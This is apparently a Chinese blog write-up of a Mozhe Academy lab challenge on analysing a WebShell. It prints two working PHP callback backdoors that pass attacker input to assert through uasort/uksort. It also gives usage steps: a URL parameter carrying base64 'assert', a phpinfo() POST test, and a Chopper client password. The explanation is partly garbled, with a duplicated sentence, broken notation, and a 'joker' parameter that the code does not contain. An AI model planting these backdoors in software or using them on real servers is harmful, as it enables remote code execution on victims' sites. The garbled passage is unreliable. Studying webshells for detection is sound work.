墨者学院 - WebShell代码分析溯源(第7题)

代码审查

在random_int.php 前排 发现以下回调后门

<?php
error_reporting(0);
$e = $_REQUEST['e'];
$arr = array('test', $_REQUEST['POST']);
uasort($arr, base64_decode($e));

诸如此类还有

<?php 
   $e = $_REQUEST['e'];  
   $arr = array('test' => 1, $_REQUEST['POST'] => 2);  
   uksort($arr, $e);
?>  

用法: http://www.xxx.com/6.php?e=YXNzZXJ0

浏览器提交POST:POST=phpinfo();

菜刀连接用法: http://www.xxx.com/6.php?e=YXNzZXJ0

                       YXNzZXJ0为assert加密值

密码:POST

详解:我们主要来看uasort,uksort这两个函数,uasort() 函数使用用户自定义的比较函数按照值对数组排序,并保持索引关联(不为元素分配新的键)

。uksort()函数用法与uasort()函数相似,不过是通过用户自定义的比较函数对数组按键名进行排序。第一个例子是按照比较值来排序,传递进来的自

定义函数assert(),会作用与(REQUEST[′joker′])这个值,就构成了一句话木马;第二个例子是按照比较键名来排序,传递进来的自定义函数assert(),会作用与(REQUEST[′joker′])这个值,就构成了一句话木马;第二个例子是按照比较键名来排序,传递进来的自定义函数assert(),会作用与(_REQUEST['joker']) 这个键名,构成了一句话木马,直接操刀链接即可。

猜你喜欢

转载自blog.csdn.net/qq_42357070/article/details/81431088